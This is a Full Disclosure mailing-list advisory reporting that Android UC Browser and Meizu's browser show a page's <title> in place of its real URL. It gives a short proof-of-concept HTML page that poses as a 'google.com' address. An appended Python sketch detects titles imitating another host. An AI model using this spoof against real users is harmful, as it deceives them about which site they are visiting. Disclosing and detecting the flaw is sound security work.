Message-ID: <CAN10O-afkamVP-zrB+mL9RV1VUK5eR29ydE7zTU23HuhOiRWZQ@mail.gmail.com>
Date: Sat, 11 Mar 2017 16:55:56 +1100
From: x ksi <s3810@...stk.edu.pl>
To: fulldisclosure@...lists.org
Subject: [FD] URL spoofing in UC browser.

Hey list.

It's possible to spoof a URL in mobile versions (Android) of the UC browser [1][2] via <title> HTML tags. The newest version from gplay (11.2.5.932) and the Meizu [3][4] branded default browser (6.1.301) are affected.

And the shocking poc would be:

--
<html>
<head>
<title>
https://you_are_safe_here.google.com/
</title>
щ(゚Д゚щ
</head>
</html>
--

which results in http://s1m0n.dft-labs.eu/files/meizu/ .

References:
[1] https://en.wikipedia.org/wiki/UC_Browser
[2] http://www.ucweb.com/company/about/
[3] http://www.meizu.com/en/
[4] http://www.themobileindian.com/news/meizu-partners-with-uc-browser-12605

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
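A detection-side sketch of the issue reported above, added here as an example and not part of the original post: it flags pages whose <title> is shaped like a URL naming a host other than the one that actually served the page. The function name, the regex heuristic and the serving URL `http://untrusted.example/poc.html` are assumptions made for illustration.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit


class _TitleParser(HTMLParser):
    """Collects the text of the first <title> element only."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self._in_title = False
        self._done = False
        self.title = ""

    def handle_starttag(self, tag, attrs):
        if tag == "title" and not self._done:
            self._in_title = True

    def handle_endtag(self, tag):
        if tag == "title" and self._in_title:
            self._in_title, self._done = False, True

    def handle_data(self, data):
        if self._in_title:
            self.title += data


# Heuristic: the whole title is "[scheme://]host.tld[:port][/path]".
# Underscores are accepted in labels because the PoC host uses them.
URL_LIKE = re.compile(
    r"^(?:https?://)?([a-z0-9_-]+(?:\.[a-z0-9_-]+)+)(?::\d+)?(?:[/?#]\S*)?$", re.I)


def title_spoof_check(html, real_url):
    """Return a finding dict if the title imitates a URL on another host, else None."""
    parser = _TitleParser()
    parser.feed(html)
    parser.close()
    title = " ".join(parser.title.split())  # collapse the newlines around the text
    match = URL_LIKE.match(title)
    if not match:
        return None
    claimed = match.group(1).lower()
    real = (urlsplit(real_url).hostname or "").lower()
    if claimed == real:
        return None
    return {"title": title, "claimed_host": claimed, "real_host": real}


# The PoC markup from the post; the serving URL is constructed for this example.
POC_HTML = ("<html>\n<head>\n<title>\nhttps://you_are_safe_here.google.com/\n"
            "</title>\n\u0449(\uff9f\u0414\uff9f\u0449\n</head>\n</html>")
POC_REAL_URL = "http://untrusted.example/poc.html"
```

Titles that are a bare `name.tld` string (a product name with a dot, for instance) also match the heuristic, so findings need review before they are treated as spoofing attempts.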